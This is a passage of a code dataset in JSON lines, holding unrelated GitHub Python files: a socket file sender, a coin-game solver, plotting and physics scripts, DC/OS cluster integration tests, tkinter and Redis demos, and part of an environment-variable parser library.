str(t+r+l))\r\n\r\n\r\n\r\n\r\n\r\nmain()\r\n","repo_name":"ericramos92/OOP","sub_path":"Project_8/cash_register.py","file_name":"cash_register.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17901141511","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# =============================\n# Author\t--> devMen\n# Date created\t--> 01/04/2021\n# Last modified\t--> 05/04/2021\n# Version\t--> Python 3.8.5\n# =============================\n\"\"\"\n\t|Python File Sender|\nprograma simple para enviar archivos\n\"\"\"\n# =============================\n# Imports\nimport socket\nimport sys\nimport time\nimport argparse\n\n# =============================\n\ndef banner():\n\treturn \"\"\"\n ___ ___ ___ _ \n | _ \\_ _/ __| ___| __(_)\n | _/ || \\__ \\/ -_) _|| |\n |_| \\_, |___/\\___|_| |_|\n |__/ \n===> by ☆ developmentMen☆\n \"\"\"\n\ndef enviar(s, filename):\n\ts.send(filename.encode())\n\ttime.sleep(1)\n\tfile = open(filename, 'rb')\n\twhile True:\n\t\tstrng = file.readline(512)\n\t\tif not strng:\n\t\t\tbreak\n\t\ts.send(strng)\n\tfile.close()\n\tprint(\"archivo enviado con exito\")\n\ndef main():\n\ts = socket.socket()\n\ts.connect((args.ipAddress, args.port))\n\tenviar(s, args.file)\n\n\ts.close()\n\n\nif __name__=='__main__':\n\targumentos = argparse.ArgumentParser(\n\t\tdescription=\"Python file sender\")\n\tg = argumentos.add_mutually_exclusive_group()\n\tg.add_argument('-nb', '--noBanner', 
action='store_true',\n\t\thelp=\"no print banner\")\n\targumentos.add_argument(\n\t\t'-i', '--ipAddress', type=str, required=True, metavar=\"\",\n\t\thelp=\"ip PySeFi Server\")\n\targumentos.add_argument(\n\t\t'-p', '--port', type=int, metavar='',\n\t\tdefault=6333, help='Port 1024 to 65535 -> default=6333')\n\targumentos.add_argument(\n\t\t'-f', '--file', type=str, required=True, metavar=\"\",\n\t\thelp=\"file to send\")\n\targs = argumentos.parse_args()\n\n\tif not args.noBanner: print(banner())\n\ttry:\n\t \tmain()\n\texcept Exception as e:\n\t\tprint('=======ERROR======ERROR=======ERROR=======')\n\t\tprint(e)\n\t\tprint('=======ERROR======ERROR=======ERROR=======')\n","repo_name":"developmentMen/pySeFi","sub_path":"pySeFi.py","file_name":"pySeFi.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"15633845421","text":"# https://github.com/mission-peace/interview/blob/master/src/com/interview/dynamic/NPotGold.java\nimport numpy as np\n\n# def calculate(T, i, j):\n# return T[i][j] if i <= j else 0\n#\n\n# def max_win(tokens):\n# n = len(tokens)\n#\n# # priebezne maximalne vyhry\n# PLAYER_TAB = np.diag(tokens)\n#\n# for interval_size in range(1, n): # prechadzaju sa rozne velke intervaly\n#\n# for end in range(interval_size, n): # koniec intervalu\n# start = end - interval_size # zaciatok intervalu\n#\n# if start + 1 > end:\n# pick_from_start = 0 # tokens[start]\n# elif tokens[start + 1] > tokens[end]: # start start\n# pick_from_start = tokens[start] + calculate(PLAYER_TAB, start + 2, end)\n# else: # start end\n# pick_from_start = tokens[start] + calculate(PLAYER_TAB, start + 1, end - 1)\n#\n# if start > end - 1:\n# pick_from_end = 0 # tokens[end]\n# elif tokens[end - 1] > tokens[start]: # end end\n# pick_from_end = tokens[end] + calculate(PLAYER_TAB, start, end - 2)\n# else: # end start\n# pick_from_end = tokens[end] + calculate(PLAYER_TAB, start + 1, end - 1)\n#\n# PLAYER_TAB[start, end] = max(pick_from_start, pick_from_end)\n#\n# return PLAYER_TAB[0, n-1]\n\n\ndef max_win(tokens):\n n = len(tokens)\n\n # priebezne maximalne vyhry\n PLAYER_TAB = np.zeros((n, n), dtype=int)\n KRUPIER_TAB = np.zeros((n, n), dtype=int)\n\n for x in range(n):\n for end in range(x, n): # koniec intervalu\n start = end - x # zaciatok intervalu\n\n # parny interval => vybera hrac\n if (x+1) % 2 == 0:\n pick_from_start = tokens[start] + KRUPIER_TAB[start + 1, end]\n pick_from_end = tokens[end] + KRUPIER_TAB[start, end - 1]\n\n # neparny interval => vybera krupier\n else:\n pick_from_start = tokens[start]\n pick_from_end = tokens[end]\n\n # maximalna vyhra\n if pick_from_start > pick_from_end:\n PLAYER_TAB[start, end] = tokens[start] + KRUPIER_TAB[start + 1, end] # hrac zoberie zo zaciatku\n KRUPIER_TAB[start, end] = PLAYER_TAB[start + 1, end] # krupierovi ostane <start+1, end>\n else:\n PLAYER_TAB[start, end] = tokens[end] + KRUPIER_TAB[start, end - 1] # hrac zoberie z konca\n KRUPIER_TAB[start, end] = PLAYER_TAB[start, end - 1] # krupierovi ostane <start, end-1>\n\n return PLAYER_TAB[0, n - 1]\n\n\nif __name__ == '__main__':\n with open(\"cvicenie6data.txt\") as f:\n file_content = list(map(int, f.read()))\n\n print(max_win(file_content))\n","repo_name":"kirschovapetra/I-ADS","sub_path":"01_Cvičenia/Cv06/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} 
+{"seq_id":"618047617","text":"#!/usr/local/bin/python3\n\n# plots the results from the speed analysis, which must be passed in as an argument\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport matplotlib.cm as cm\nimport matplotlib.colors as clr\nimport sys\n\ncontinuous, scene, tstep, runtime = np.loadtxt(sys.argv[1], skiprows=1, delimiter=',', unpack=True)\nnsteps = np.array(10 / tstep, dtype=int)\nscene = np.array(scene, dtype=int)\n\ntmap = {0.01:0, 0.05:1, 0.1:2, 0.8:3, 1.5:4}\n\nctimes = np.ndarray((8, 5))\ndtimes = np.ndarray((8, 5))\nnegclr = (0,0.8,0.3,1)\ntunnelclr = (0,0.3,0.8,1)\n\nneg = cm.Reds_r\nneg.set_bad(color=negclr)\n\nfor i in range(len(scene)//2):\n ctimes[scene[i]-1, tmap[tstep[i]]] = runtime[i]/nsteps[i]\nfor i in range(len(scene)//2, len(scene)):\n dtimes[scene[i]-1, tmap[tstep[i]]] = runtime[i]/nsteps[i]\n\nneg_mask = np.ma.masked_where(ctimes < 0, ctimes)\n\nctunnels = [(6,x) for x in tmap if x != 0.1]\ndtunnels = [(3,0.1), (3,0.8), (7, 0.8)]\ndtunnels += [(x,1.5) for x in range(1,9)]\ndtunnels += [(6,x) for x in tmap]\n\ntunnel = clr.LinearSegmentedColormap.from_list('tunnel', [(0,0,0,0), (0,0,0,0)], N=2)\ntunnel.set_bad(color=tunnelclr)\ncmasktmp = ctimes.copy()\nfor (i,j) in ctunnels:\n cmasktmp[i-1][tmap[j]] = -2\nctunnel_mask = np.ma.masked_where(cmasktmp == -2, cmasktmp)\n\ndmasktmp = dtimes.copy()\nfor (i,j) in dtunnels:\n dmasktmp[i-1][tmap[j]] = -2\ndtunnel_mask = np.ma.masked_where(dmasktmp == -2, dmasktmp)\n\naxsz = 15\nheadersz = 20\ntunnel_patch = mpatches.Patch(color=tunnelclr, label='Tunneling')\nneg_patch = mpatches.Patch(color=negclr, label='Infinite\\nLoop')\n\n\nfig, ax = plt.subplots()\nfig.set_tight_layout(True)\ncplot = ax.imshow(neg_mask, cmap=neg, vmin=0, extent=(-0.5,4.5, 8.5,0.5), aspect='equal')\nax.imshow(ctunnel_mask, cmap=tunnel, extent=(-0.5,4.5, 8.5,0.5), aspect='equal')\nax.set_ylabel(\"Test Scenario\", size=axsz)\nax.set_xlabel(\"Timestep index\", size=axsz)\ncpbar = fig.colorbar(cplot, ax=ax)\ncpbar.ax.set_ylabel(\"Real time (s) per timestep\", size=axsz)\nax.set_title(\"Continuous Collision\\nResponse\", size=headersz)\nfig.legend(handles=[tunnel_patch, neg_patch], loc=\"center left\", prop={'size' : axsz})\nplt.show()\n\nfig, ax = plt.subplots()\nfig.set_tight_layout(True)\ndplot = ax.imshow(dtimes, cmap=neg, extent=(-0.5,4.5, 8.5,0.5), aspect='equal')\nax.imshow(dtunnel_mask, cmap=tunnel, extent=(-0.5,4.5, 8.5,0.5), aspect='equal')\nax.set_ylabel(\"Test Scenario\", size=axsz)\nax.set_xlabel(\"Timestep index\", size=axsz)\ndpbar = fig.colorbar(dplot, ax=ax)\ndpbar.ax.set_ylabel(\"Real time (s) per timestep\", size=axsz)\nax.set_title(\"Discrete Collision\\nResponse\", size=headersz)\nfig.legend(handles=[tunnel_patch, neg_patch], loc=\"center left\", prop={'size' : axsz})\n\nplt.show()","repo_name":"lfdelta/RbodySim","sub_path":"speed_analysis.py","file_name":"speed_analysis.py","file_ext":"py","file_size_in_byte":2721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19791945286","text":"import json\nimport logging\nimport os\nimport subprocess\n\nimport kazoo.client\nimport pytest\nimport requests\n\n\n@pytest.mark.first\ndef test_cluster_is_up(cluster):\n pass\n\n\ndef test_if_all_mesos_masters_have_registered(cluster):\n # Currently it is not possible to extract this information through Mesos'es\n # API, let's query zookeeper directly.\n zk = kazoo.client.KazooClient(hosts=cluster.zk_hostports, read_only=True)\n 
master_ips = []\n\n zk.start()\n for znode in zk.get_children(\"/mesos\"):\n if not znode.startswith(\"json.info_\"):\n continue\n master = json.loads(zk.get(\"/mesos/\" + znode)[0].decode('utf-8'))\n master_ips.append(master['address']['ip'])\n zk.stop()\n\n assert sorted(master_ips) == cluster.masters\n\n\ndef test_if_all_exhibitors_are_in_sync(cluster):\n r = cluster.get('/exhibitor/exhibitor/v1/cluster/status')\n assert r.status_code == 200\n\n correct_data = sorted(r.json(), key=lambda k: k['hostname'])\n\n for zk_ip in cluster.public_masters:\n resp = requests.get('http://{}:8181/exhibitor/v1/cluster/status'.format(zk_ip))\n assert resp.status_code == 200\n\n tested_data = sorted(resp.json(), key=lambda k: k['hostname'])\n assert correct_data == tested_data\n\n\ndef test_mesos_agent_role_assignment(cluster):\n state_endpoint = '/state.json'\n for agent in cluster.public_slaves:\n r = cluster.get(path=state_endpoint, node=agent, port=5051)\n assert r.json()['flags']['default_role'] == 'slave_public'\n for agent in cluster.slaves:\n r = cluster.get(path=state_endpoint, node=agent, port=5051)\n assert r.json()['flags']['default_role'] == '*'\n\n\ndef test_signal_service(cluster):\n \"\"\"\n signal-service runs on an hourly timer, this test runs it as a one-off\n and pushes the results to the test_server app for easy retrieval\n \"\"\"\n # This is due to caching done by 3DT / Signal service\n # We're going to remove this soon: https://mesosphere.atlassian.net/browse/DCOS-9050\n dcos_version = os.environ[\"DCOS_VERSION\"]\n signal_config = open('/opt/mesosphere/etc/dcos-signal-config.json', 'r')\n signal_config_data = json.loads(signal_config.read())\n customer_key = signal_config_data.get('customer_key', '')\n enabled = signal_config_data.get('enabled', 'false')\n cluster_id_file = open('/var/lib/dcos/cluster-id')\n cluster_id = cluster_id_file.read().strip()\n\n if enabled == 'false':\n pytest.skip('Telemetry disabled in /opt/mesosphere/etc/dcos-signal-config.json... 
skipping test')\n\n print(\"Version: \", dcos_version)\n print(\"Customer Key: \", customer_key)\n print(\"Cluster ID: \", cluster_id)\n\n direct_report = cluster.get('/system/health/v1/report?cache=0')\n signal_results = subprocess.check_output([\"/opt/mesosphere/bin/dcos-signal\", \"-test\"], universal_newlines=True)\n r_data = json.loads(signal_results)\n\n exp_data = {\n 'diagnostics': {\n 'event': 'health',\n 'anonymousId': cluster_id,\n 'properties': {}\n },\n 'cosmos': {\n 'event': 'package_list',\n 'anonymousId': cluster_id,\n 'properties': {}\n },\n 'mesos': {\n 'event': 'mesos_track',\n 'anonymousId': cluster_id,\n 'properties': {}\n }\n }\n\n # Generic properties which are the same between all tracks\n generic_properties = {\n 'provider': cluster.provider,\n 'source': 'cluster',\n 'clusterId': cluster_id,\n 'customerKey': customer_key,\n 'environmentVersion': dcos_version,\n 'variant': 'open'\n }\n\n # Insert the generic property data which is the same between all signal tracks\n exp_data['diagnostics']['properties'].update(generic_properties)\n exp_data['cosmos']['properties'].update(generic_properties)\n exp_data['mesos']['properties'].update(generic_properties)\n\n # Insert all the diagnostics data programmatically\n master_units = [\n 'adminrouter-service',\n 'adminrouter-reload-service',\n 'adminrouter-reload-timer',\n 'cosmos-service',\n 'exhibitor-service',\n 'history-service',\n 'log-master-service',\n 'log-master-socket',\n 'logrotate-master-service',\n 'logrotate-master-timer',\n 'marathon-service',\n 'mesos-dns-service',\n 'mesos-master-service',\n 'metronome-service',\n 'signal-service']\n all_node_units = [\n '3dt-service',\n 'epmd-service',\n 'gen-resolvconf-service',\n 'gen-resolvconf-timer',\n 'minuteman-service',\n 'navstar-service',\n 'pkgpanda-api-service',\n 'pkgpanda-api-socket',\n 'signal-timer',\n 'spartan-service',\n 'spartan-watchdog-service',\n 'spartan-watchdog-timer']\n slave_units = [\n 'mesos-slave-service']\n public_slave_units = [\n 'mesos-slave-public-service']\n all_slave_units = [\n 'docker-gc-service',\n 'docker-gc-timer',\n '3dt-socket',\n 'adminrouter-agent-service',\n 'adminrouter-agent-reload-service',\n 'adminrouter-agent-reload-timer',\n 'log-agent-service',\n 'log-agent-socket',\n 'logrotate-agent-service',\n 'logrotate-agent-timer',\n 'rexray-service']\n\n master_units.append('oauth-service')\n\n for unit in master_units:\n exp_data['diagnostics']['properties'][\"health-unit-dcos-{}-total\".format(unit)] = len(cluster.masters)\n exp_data['diagnostics']['properties'][\"health-unit-dcos-{}-unhealthy\".format(unit)] = 0\n for unit in all_node_units:\n exp_data['diagnostics']['properties'][\"health-unit-dcos-{}-total\".format(unit)] = len(\n cluster.all_slaves + cluster.masters)\n exp_data['diagnostics']['properties'][\"health-unit-dcos-{}-unhealthy\".format(unit)] = 0\n for unit in slave_units:\n exp_data['diagnostics']['properties'][\"health-unit-dcos-{}-total\".format(unit)] = len(cluster.slaves)\n exp_data['diagnostics']['properties'][\"health-unit-dcos-{}-unhealthy\".format(unit)] = 0\n for unit in public_slave_units:\n exp_data['diagnostics']['properties'][\"health-unit-dcos-{}-total\".format(unit)] = len(cluster.public_slaves)\n exp_data['diagnostics']['properties'][\"health-unit-dcos-{}-unhealthy\".format(unit)] = 0\n for unit in all_slave_units:\n exp_data['diagnostics']['properties'][\"health-unit-dcos-{}-total\".format(unit)] = len(cluster.all_slaves)\n 
exp_data['diagnostics']['properties'][\"health-unit-dcos-{}-unhealthy\".format(unit)] = 0\n\n def check_signal_data():\n # Check the entire hash of diagnostics data\n assert r_data['diagnostics'] == exp_data['diagnostics']\n # Check a subset of things regarding Mesos that we can logically check for\n framework_names = [x['name'] for x in r_data['mesos']['properties']['frameworks']]\n assert 'marathon' in framework_names\n assert 'metronome' in framework_names\n # There are no packages installed by default on the integration test, ensure the key exists\n assert len(r_data['cosmos']['properties']['package_list']) == 0\n\n try:\n check_signal_data()\n except AssertionError as err:\n logging.info('System report: {}'.format(direct_report.json()))\n raise err\n","repo_name":"samchiang/DC-OS","sub_path":"packages/dcos-integration-test/extra/test_composition.py","file_name":"test_composition.py","file_ext":"py","file_size_in_byte":7340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35636478469","text":"import tkinter as tk\nfrom tkinter import * \nmy_w = tk.Tk()\nmy_w.geometry(\"200x200\") # Size of the window \nmy_w.title(\"www.plus2net.com\") # Adding a title\n\n# create one label \nmy_str = tk.StringVar()\nl1 = tk.Label(my_w, textvariable=my_str )\nl1.grid(row=1,column=2) \nmy_str.set(\"Hi I am main window\")\n# add one button \nb1 = tk.Button(my_w, text='Click me to open new window',\n command=lambda:my_open())\nb1.grid(row=2,column=2) \n\ndef my_open():\n my_w_child=Toplevel(my_w) # Child window \n my_w_child.geometry(\"250x200\") # Size of the window \n my_w_child.title(\"www.plus2net.com\")\n\n l1 = tk.Label(my_w_child, text='Your Name', width=10 ) \n l1.grid(row=1,column=1) \n\n e1 = tk.Entry(my_w_child, width=20,bg='yellow') \n e1.grid(row=1,column=2)\n b2 = tk.Button(my_w_child, text='Submit',\n command=lambda:my_str.set(e1.get()))\n b2.grid(row=2,column=2) \n b3 = tk.Button(my_w_child, text=' Close Child',\n command=my_w_child.destroy)\n b3.grid(row=3,column=2)\n \nmy_w.mainloop()","repo_name":"FerGVargas/Dev.Full_Stack","sub_path":"Mundo 1/Missão Certificação/estudos/estudoImgs/testeWChild.py","file_name":"testeWChild.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"33483098500","text":"import numpy as np\nimport timeit\n\ndef randSurface(N): # Creates random surface matrix\n o = 3*N - 9\n ag = N*N - 3*N + 2\n surface = np.zeros(N*N)\n for i in range(0,ag):\n surface[i] = 1\n for i in range(ag,ag+o):\n surface[i] = 2\n surface = np.random.permutation(surface)\n surface = np.reshape(surface,(N,N))\n return surface\n\ndef oo(matrix,i,j,size): # Checks for O-O interaction\n E = 0\n if i == size-1:\n i = -1\n if j == size-1:\n j = -1\n if matrix[i,j+1] == 2 and matrix[i-1,j] == 2:\n E += 1\n if matrix[i-1,j] == 2 and matrix[i-1,j-1] == 2:\n E += 1\n if matrix[i-1,j-1] == 2 and matrix[i,j-1] == 2:\n E += 1\n if matrix[i,j-1] == 2 and matrix[i+1,j] == 2:\n E += 1\n if matrix[i+1,j] == 2 and matrix[i+1,j+1] == 2:\n E += 1\n if matrix[i+1,j+1] == 2 and matrix[i,j+1] == 2:\n E += 1\n return E\n\ndef agag(matrix,i,j,size): # Checks for Ag-Ag interaction\n E = 0\n if i == size-1:\n i = -1\n if j == size-1:\n j = -1\n if matrix[i,j+1] == 1 and matrix[i-1,j] == 1:\n E -= 1\n if matrix[i-1,j] == 1 and matrix[i-1,j-1] == 1:\n E -= 1\n if matrix[i-1,j-1] == 1 and matrix[i,j-1] == 1:\n E -= 1\n if matrix[i,j-1] == 1 and matrix[i+1,j] 
== 1:\n E -= 1\n if matrix[i+1,j] == 1 and matrix[i+1,j+1] == 1:\n E -= 1\n if matrix[i+1,j+1] == 1 and matrix[i,j+1] == 1:\n E -= 1\n return E\n\ndef ago(matrix,i,j,size): # Checks for Ag-O interaction\n E = 0\n if i == size-1:\n i = -1\n if j == size-1:\n j = -1\n if matrix[i,j+1] == 1 and matrix[i-1,j] != 1 and matrix[i-1,j-1] == 1 and matrix[i,j-1] == 1 and matrix[i+1,j] != 1 and matrix[i+1,j+1] == 1:\n E -= 4\n if matrix[i,j+1] != 1 and matrix[i-1,j] == 1 and matrix[i-1,j-1] == 1 and matrix[i,j-1] != 1 and matrix[i+1,j] == 1 and matrix[i+1,j+1] == 1:\n E -= 4\n if matrix[i,j+1] == 1 and matrix[i-1,j] == 1 and matrix[i-1,j-1] != 1 and matrix[i,j-1] == 1 and matrix[i+1,j] == 1 and matrix[i+1,j+1] != 1:\n E -= 4\n return E\n\n\n# Calculate the energy\ndef calculateEnergy(surface,size): # Find size from surface instead\n E = 0\n for i in range(size): \n for j in range(size):\n if surface[i,j] == 2:\n E += oo(surface,i,j,size)\n E += ago(surface,i,j,size)\n if surface[i,j] == 1:\n E += agag(surface,i,j,size)\n return E\n\nif __name__ == '__main__':\n runs = 100\n size = 5\n t0 = timeit.default_timer()\n for i in range(100):\n surface = randSurface(size)\n E = calculateEnergy(surface,size)\n t1 = timeit.default_timer()\n#print('The random surface structure is', surface)\n#print('The energy is', E)\n print('The total time for the calculation is',t1-t0, 'seconds')\n\n# Now try with optimized code\n def calculate_single_energy(surface):\n myboard = surface\n myboard_right_neighbor = np.roll(myboard,-1,axis=1)\n myboard_left_neighbor = np.roll(myboard,1,axis=1)\n myboard_upper_right_neighbor = np.roll(myboard,1,axis=0)\n myboard_lower_left_neighbor = np.roll(myboard,-1,axis=0)\n myboard_upper_left_neighbor = np.roll(myboard_left_neighbor,1,axis=0)\n myboard_lower_right_neighbor = np.roll(myboard_right_neighbor,-1,axis=0)\n\n # Ag triangles\n e1 = -3 * sum(sum((myboard == 1) * (myboard_right_neighbor == 1) * (myboard_upper_right_neighbor == 1)))\n e2 = -3 * sum(sum((myboard == 1) * (myboard_right_neighbor == 1) * (myboard_lower_right_neighbor == 1)))\n\n # O triangles\n e3 = 3 * sum(sum((myboard == 2) * (myboard_right_neighbor == 2) * (myboard_upper_right_neighbor == 2)))\n e4 = 3 * sum(sum((myboard == 2) * (myboard_right_neighbor == 2) * (myboard_lower_right_neighbor == 2)))\n\n # O in perfect 4 Ag setup\n e5 = -4 * sum(sum((myboard == 2) * (myboard_right_neighbor == 1) * (myboard_upper_right_neighbor == 1) * (myboard_upper_left_neighbor != 1) * (myboard_left_neighbor == 1) * (myboard_lower_left_neighbor == 1) * (myboard_lower_right_neighbor != 1) ))\n e6 = -4 * sum(sum((myboard == 2) * (myboard_right_neighbor != 1) * (myboard_upper_right_neighbor == 1) * (myboard_upper_left_neighbor == 1) * (myboard_left_neighbor != 1) * (myboard_lower_left_neighbor == 1) * (myboard_lower_right_neighbor == 1) ))\n e7 = -4 * sum(sum((myboard == 2) * (myboard_right_neighbor == 1) * (myboard_upper_right_neighbor != 1) * (myboard_upper_left_neighbor == 1) * (myboard_left_neighbor == 1) * (myboard_lower_left_neighbor != 1) * (myboard_lower_right_neighbor == 1) ))\n return e1+e2+e3+e4+e5+e6+e7\n\n t0 = timeit.default_timer()\n for i in range(100):\n surface = randSurface(size)\n E = calculate_single_energy(surface)\n t1 = timeit.default_timer()\n print('Now trying with more advanced algorithm')\n#print('The energy is',E)\n print('The total time for the calculation 
is',t1-t0,'seconds')\n","repo_name":"HenrikLundMortensen/surfaceProject","sub_path":"surfaceProject/energycalculations/calcenergy.py","file_name":"calcenergy.py","file_ext":"py","file_size_in_byte":5000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44472880902","text":"import sys\nfrom redis import Redis, exceptions as redisExeptions\nimport docker\nfrom time import sleep\nfrom random import choice\n\nredis = Redis(decode_responses=\"utf-8\")\n\nclient = docker.from_env()\n\ncontainer_name = \"redis-container\"\n\nif client.containers.get(container_name):\n print(\"container exists\")\nelse :\n try: \n redis_container = client.containers.run(\n image='redis:latest' ,\n name=f\"{container_name}\",\n ports={ '6379/tcp': 6379 },\n detach=True\n )\n sleep(20)\n except Exception as e:\n print(e)\n\n# Loop until Redis container is ready\nwhile True:\n try:\n # Ping Redis server\n response = redis.ping()\n\n # If response is PONG, Redis container is ready\n if response == True:\n print(\"Redis container is ready!\")\n break\n except redisExeptions.ConnectionError:\n pass\n \n # Wait 1 second before trying again\n sleep(1)\n \nif len(redis.keys(\"job:*\")) == 0:\n # set jobs for test\n redis.hset(\"job:1\", mapping={\"stage\": \"0\", \"status\": \"new\"})\n redis.hset(\"job:2\", mapping={\"stage\": \"0\", \"status\": \"new\"})\n redis.hset(\"job:3\", mapping={\"stage\": \"0\", \"status\": \"new\"})\n redis.hset(\"job:4\", mapping={\"stage\": \"0\", \"status\": \"new\"})\n\n# worker to get one job and change the values\nif len(sys.argv) > 2:\n # get argument values\n sleep_time = int(sys.argv[1])\n worker_number = sys.argv[2]\n\n while True:\n # get all jobs from Redis and pick one job\n jobs = redis.keys(\"job:*\")\n \n if not jobs:\n print(f\"No jobs available for worker {worker_number}. Sleeping for {sleep_time} seconds...\")\n sleep(sleep_time)\n continue\n \n current_job = choice(jobs)\n\n # Check whether another worker has already fetched this job\n if redis.exists(\"worker_\" + current_job):\n print(f\"job conflict {current_job}\")\n continue\n\n # Set a worker key to reserve this job for this worker\n redis.set(\"worker_\" + current_job, worker_number)\n\n while True:\n try:\n sleep(sleep_time)\n \n pipeline = redis.pipeline()\n\n # use a watch command to monitor the job key for changes\n pipeline.watch(current_job)\n\n # check if the job has already been completed by another worker\n if redis.hget(current_job, \"status\") == \"done\":\n print(f\"Job {current_job} has already been completed.\")\n break\n\n # get the current values of the job key\n job_values = redis.hgetall(current_job)\n\n # update the stage and status values in the job key\n job_values[\"stage\"] = \"1\"\n job_values[\"status\"] = \"done\"\n\n # start a transaction using multi\n pipeline.multi()\n\n # update the job key with the new values\n pipeline.hset(current_job, mapping=job_values)\n\n # execute the transaction\n pipeline.execute()\n\n # print a message indicating the job was completed\n print(f\"Job {current_job} completed by worker {worker_number}.\")\n break\n\n except redisExeptions.WatchError:\n # another client changed the job key, so we need to retry\n print(f\"Transaction failed for worker {worker_number} on job {current_job}. Retrying...\")\n continue\n\n redis.delete(\"worker_\" + current_job)\n\nelse:\n print(\"Insufficient arguments. Please provide sleep time and worker number in arguments. 
example : x.py 20 1\")","repo_name":"a-malex/python-redis-small-projects","sub_path":"redis/04-redis-transaction-worker.py","file_name":"04-redis-transaction-worker.py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40343590934","text":"from __future__ import annotations\n\nimport re\nfrom enum import Enum, auto\nfrom functools import lru_cache\nfrom itertools import chain\nfrom typing import (\n Any,\n Callable,\n Dict,\n Generic,\n Iterable,\n Iterator,\n Mapping,\n Optional,\n Pattern,\n Tuple,\n Type,\n TypeVar,\n Union,\n)\n\nfrom envolved.utils import extract_from_option\n\n__all__ = [\"Parser\", \"BoolParser\", \"CollectionParser\", \"parser\"]\n\n\nBaseModel1: Optional[Type]\nBaseModel2: Optional[Type]\nTypeAdapter: Optional[Type]\n\ntry: # pydantic v2\n from pydantic import BaseModel as BaseModel2, TypeAdapter\n from pydantic.v1 import BaseModel as BaseModel1\nexcept ImportError:\n BaseModel2 = TypeAdapter = None\n try: # pydantic v1\n from pydantic import BaseModel as BaseModel1\n except ImportError:\n BaseModel1 = None\n\nT = TypeVar(\"T\")\n\nParser = Callable[[str], T]\nParserInput = Union[Parser[T], Type[T]]\n\nspecial_parser_inputs: Dict[ParserInput[Any], Parser[Any]] = {\n bytes: str.encode,\n}\n\nparser_special_instances: Dict[Type, Callable[[Any], Parser]] = {}\nif TypeAdapter is not None:\n parser_special_instances[TypeAdapter] = lambda t: t.validate_json\n\nparser_special_superclasses: Dict[Type, Callable[[Type], Parser]] = {}\nif BaseModel1 is not None:\n parser_special_superclasses[BaseModel1] = lambda t: t.parse_raw\nif BaseModel2 is not None:\n parser_special_superclasses[BaseModel2] = lambda t: t.model_validate_json\n\n\ndef complex_parser(x: str) -> complex:\n x = x.replace(\"i\", \"j\")\n return complex(x)\n\n\nspecial_parser_inputs[complex] = complex_parser\n\n\ndef parser(t: ParserInput[T]) -> Parser[T]:\n \"\"\"\n Coerce an object into a parser.\n :param t: The object to coerce to a parser.\n :return: The best-match parser for `t`.\n \"\"\"\n special_parser = special_parser_inputs.get(t)\n if special_parser is not None:\n return special_parser\n\n from_option = extract_from_option(t)\n if from_option is not None:\n return parser(from_option)\n\n for special_cls, parser_factory in parser_special_instances.items():\n if isinstance(t, special_cls):\n return parser_factory(t)\n\n if isinstance(t, type):\n for supercls, parser_factory in parser_special_superclasses.items():\n if issubclass(t, supercls):\n return parser_factory(t)\n\n if callable(t):\n return t\n\n raise TypeError(f\"cannot coerce type {t!r} to a parser\")\n\n\nclass BoolParser:\n \"\"\"\n A helper to parse boolean values from text\n \"\"\"\n\n def __init__(\n self,\n maps_to_true: Iterable[str] = (),\n maps_to_false: Iterable[str] = (),\n *,\n default: Optional[bool] = None,\n case_sensitive: bool = False,\n ):\n \"\"\"\n :param maps_to_true: An iterable of string values that should evaluate to True\n :param maps_to_false: An iterable of string values that should evaluate to True\n :param default: The behaviour for when the value is vacant from both the true iterable and the falsish iterable.\n :param case_sensitive: Whether the string values should match exactly or case-insensitivity.\n \"\"\"\n if not case_sensitive:\n maps_to_true = map(str.lower, maps_to_true)\n maps_to_false = map(str.lower, maps_to_false)\n\n self.truth_set = frozenset(maps_to_true)\n self.false_set = 
frozenset(maps_to_false)\n\n self.case_sensitive = case_sensitive\n self.default = default\n\n def __call__(self, x: str) -> bool:\n if not self.case_sensitive:\n x = x.lower()\n if x in self.truth_set:\n return True\n if x in self.false_set:\n return False\n if self.default is None:\n raise ValueError(\n f\"must evaluate to either true ({', '.join(self.truth_set)}) or\" f\" false ({', '.join(self.false_set)})\"\n )\n return self.default\n\n\nspecial_parser_inputs[bool] = BoolParser([\"true\"], [\"false\"])\n\nE = TypeVar(\"E\")\nG = TypeVar(\"G\")\n\nempty_pattern = re.compile(\"\")\n\nNeedle = Union[str, Pattern[str]]\n\n_no_regex_flags = re.RegexFlag(0)\n\n\ndef needle_to_pattern(n: Needle, flags: re.RegexFlag = _no_regex_flags) -> Pattern[str]:\n if isinstance(n, str):\n return re.compile(re.escape(n), flags)\n return n\n\n\nK = TypeVar(\"K\")\nV = TypeVar(\"V\")\n\n\ndef _duplicate_avoiding_dict(pairs: Iterator[Tuple[K, V]]) -> Dict[K, V]:\n \"\"\"\n The default output_type of CollectionParser.delimited_pairwise. Returns a dict from key-value pairs while\n ensuring there are no duplicate keys.\n \"\"\"\n ret = {}\n for k, v in pairs:\n if k in ret:\n raise ValueError(f\"duplicate key {k}\")\n ret[k] = v\n return ret\n\n\nclass CollectionParser(Generic[G, E]):\n \"\"\"\n A parser that splits a string by a delimiter, and parses each part individually.\n \"\"\"\n\n def __init__(\n self,\n delimiter: Needle,\n inner_parser: ParserInput[E],\n output_type: Callable[[Iterator[E]], G] = list, # type: ignore[assignment]\n opener: Needle = empty_pattern,\n closer: Needle = empty_pattern,\n ):\n \"\"\"\n :param delimiter: The delimiter to split by.\n :param inner_parser: The inner parser to apply to each element.\n :param output_type: The aggregator function of all the parsed elements.\n :param opener: Optional opener that must be present at the start of the string.\n :param closer: Optional closer that must be present at the end of the string.\n 